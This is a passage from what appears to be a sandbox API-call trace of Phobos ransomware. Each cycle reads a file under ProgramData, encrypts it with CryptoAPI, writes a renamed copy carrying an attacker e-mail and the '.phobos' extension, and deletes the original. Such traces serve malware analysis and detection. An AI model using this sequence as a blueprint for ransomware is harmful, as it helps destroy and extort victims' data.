pictures\\guest.bmp")) returned 0x20 [0145.939] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\guest.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0145.939] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\guest.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0145.939] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0145.939] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0145.940] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\guest.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0145.940] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0145.940] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0145.940] ReadFile (in: hFile=0x138, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xc038, lpOverlapped=0x0) returned 1 [0145.995] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xc040, dwBufLen=0xc040 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xc040) returned 1 [0145.995] WriteFile (in: hFile=0x18c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xc040, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xc040, lpOverlapped=0x0) returned 1 [0145.997] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0145.997] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0145.997] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0145.997] CryptDestroyKey (hKey=0xa32da8) returned 1 [0145.997] WriteFile (in: hFile=0x18c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0145.997] CryptDestroyKey (hKey=0xa32d68) returned 1 [0145.997] CloseHandle (hObject=0x138) returned 1 [0145.997] CloseHandle (hObject=0x18c) returned 1 [0145.998] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\guest.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\guest.bmp")) returned 1 [0145.999] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0145.999] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0145.999] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=49208) returned 1 [0145.999] CloseHandle (hObject=0x18c) returned 1 [0145.999] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user.bmp")) returned 0x20 [0146.000] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0146.000] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0146.000] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0146.000] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0146.000] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0146.000] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0146.000] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0146.000] ReadFile (in: hFile=0x18c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xc038, lpOverlapped=0x0) returned 1 [0146.001] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xc040, dwBufLen=0xc040 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xc040) returned 1 [0146.001] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xc040, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xc040, lpOverlapped=0x0) returned 1 [0146.002] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0146.002] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0146.003] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0146.003] CryptDestroyKey (hKey=0xa32da8) returned 1 [0146.003] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0146.003] CryptDestroyKey (hKey=0xa32d68) returned 1 [0146.003] CloseHandle (hObject=0x18c) returned 1 [0146.003] CloseHandle (hObject=0x138) returned 1 [0146.004] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\user.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\user.bmp")) returned 1 [0146.005] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0146.005] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0146.005] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=16384) returned 1 [0146.005] CloseHandle (hObject=0x138) returned 1 [0146.005] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")) returned 0x2020 [0146.005] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0146.005] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0146.005] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0146.005] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0146.005] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0146.006] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0146.006] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0146.006] ReadFile (in: hFile=0x138, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x4000, lpOverlapped=0x0) returned 1 [0146.007] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4010, dwBufLen=0x4010 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4010) returned 1 [0146.007] WriteFile (in: hFile=0x18c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x4010, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x4010, lpOverlapped=0x0) returned 1 [0146.008] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0146.008] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0146.008] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0146.008] CryptDestroyKey (hKey=0xa32da8) returned 1 [0146.008] WriteFile (in: hFile=0x18c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0146.008] CryptDestroyKey (hKey=0xa32d68) returned 1 [0146.008] CloseHandle (hObject=0x138) returned 1 [0146.008] CloseHandle (hObject=0x18c) returned 1 [0146.009] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")) returned 0 [0146.009] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0146.009] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{11336D5B-7F61-4871-82E3-E0F59766823B}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{11336d5b-7f61-4871-82e3-e0f59766823b}.2.ver0x0000000000000001.db"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0146.010] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1048) returned 1 [0146.010] CloseHandle (hObject=0x18c) returned 1 [0146.010] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{11336D5B-7F61-4871-82E3-E0F59766823B}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{11336d5b-7f61-4871-82e3-e0f59766823b}.2.ver0x0000000000000001.db")) returned 0x2020 [0146.010] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{11336D5B-7F61-4871-82E3-E0F59766823B}.2.ver0x0000000000000001.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{11336d5b-7f61-4871-82e3-e0f59766823b}.2.ver0x0000000000000001.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0146.010] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{11336D5B-7F61-4871-82E3-E0F59766823B}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{11336d5b-7f61-4871-82e3-e0f59766823b}.2.ver0x0000000000000001.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0146.010] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0146.010] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0146.010] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{11336D5B-7F61-4871-82E3-E0F59766823B}.2.ver0x0000000000000001.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{11336d5b-7f61-4871-82e3-e0f59766823b}.2.ver0x0000000000000001.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0146.010] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0146.010] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0146.010] ReadFile (in: hFile=0x18c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x418, lpOverlapped=0x0) returned 1 [0146.012] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x420, dwBufLen=0x420 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x420) returned 1 [0146.012] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x420, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x420, lpOverlapped=0x0) returned 1 [0146.013] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0146.013] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0146.013] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb0, dwBufLen=0xb0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb0) returned 1 [0146.013] CryptDestroyKey (hKey=0xa32da8) returned 1 [0146.013] WriteFile (in: hFile=0x138, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x162, lpOverlapped=0x0) returned 1 [0146.013] CryptDestroyKey (hKey=0xa32d68) returned 1 [0146.013] CloseHandle (hObject=0x18c) returned 1 [0146.013] CloseHandle (hObject=0x138) returned 1 [0146.014] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{11336D5B-7F61-4871-82E3-E0F59766823B}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{11336d5b-7f61-4871-82e3-e0f59766823b}.2.ver0x0000000000000001.db")) returned 1 [0146.014] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0146.015] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{3978EA0A-1C7E-4449-8AE1-E1265F039002}.2.ver0x0000000000000003.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{3978ea0a-1c7e-4449-8ae1-e1265f039002}.2.ver0x0000000000000003.db"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0146.015] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1216) returned 1 [0146.015] CloseHandle (hObject=0x138) returned 1 [0146.015] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{3978EA0A-1C7E-4449-8AE1-E1265F039002}.2.ver0x0000000000000003.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{3978ea0a-1c7e-4449-8ae1-e1265f039002}.2.ver0x0000000000000003.db")) returned 0x2020 [0146.015] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{3978EA0A-1C7E-4449-8AE1-E1265F039002}.2.ver0x0000000000000003.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{3978ea0a-1c7e-4449-8ae1-e1265f039002}.2.ver0x0000000000000003.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0146.015] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{3978EA0A-1C7E-4449-8AE1-E1265F039002}.2.ver0x0000000000000003.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{3978ea0a-1c7e-4449-8ae1-e1265f039002}.2.ver0x0000000000000003.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0146.015] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0146.015] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0146.015] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{3978EA0A-1C7E-4449-8AE1-E1265F039002}.2.ver0x0000000000000003.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{3978ea0a-1c7e-4449-8ae1-e1265f039002}.2.ver0x0000000000000003.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0146.015] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0146.015] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0146.016] ReadFile (in: hFile=0x138, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x4c0, lpOverlapped=0x0) returned 1 [0146.016] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4d0, dwBufLen=0x4d0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4d0) returned 1 [0146.016] WriteFile (in: hFile=0x18c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x4d0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x4d0, lpOverlapped=0x0) returned 1 [0146.017] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0146.017] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0146.017] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb0, dwBufLen=0xb0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb0) returned 1 [0146.017] CryptDestroyKey (hKey=0xa32da8) returned 1 [0146.017] WriteFile (in: hFile=0x18c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x162, lpOverlapped=0x0) returned 1 [0146.017] CryptDestroyKey (hKey=0xa32d68) returned 1 [0146.017] CloseHandle (hObject=0x138) returned 1 [0146.017] CloseHandle (hObject=0x18c) returned 1 [0146.018] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{3978EA0A-1C7E-4449-8AE1-E1265F039002}.2.ver0x0000000000000003.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{3978ea0a-1c7e-4449-8ae1-e1265f039002}.2.ver0x0000000000000003.db")) returned 0 [0146.018] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0146.018] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{40FC8D7D-05ED-4FEB-B03B-6C100659EF5C}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0146.018] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2312) returned 1 [0146.018] CloseHandle (hObject=0x18c) returned 1 [0146.018] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{40FC8D7D-05ED-4FEB-B03B-6C100659EF5C}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db")) returned 0x2020 [0146.019] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{40FC8D7D-05ED-4FEB-B03B-6C100659EF5C}.2.ver0x0000000000000001.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0146.019] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{40FC8D7D-05ED-4FEB-B03B-6C100659EF5C}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0146.019] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0146.019] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0146.019] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Caches\\{40FC8D7D-05ED-4FEB-B03B-6C100659EF5C}.2.ver0x0000000000000001.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0147.028] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, 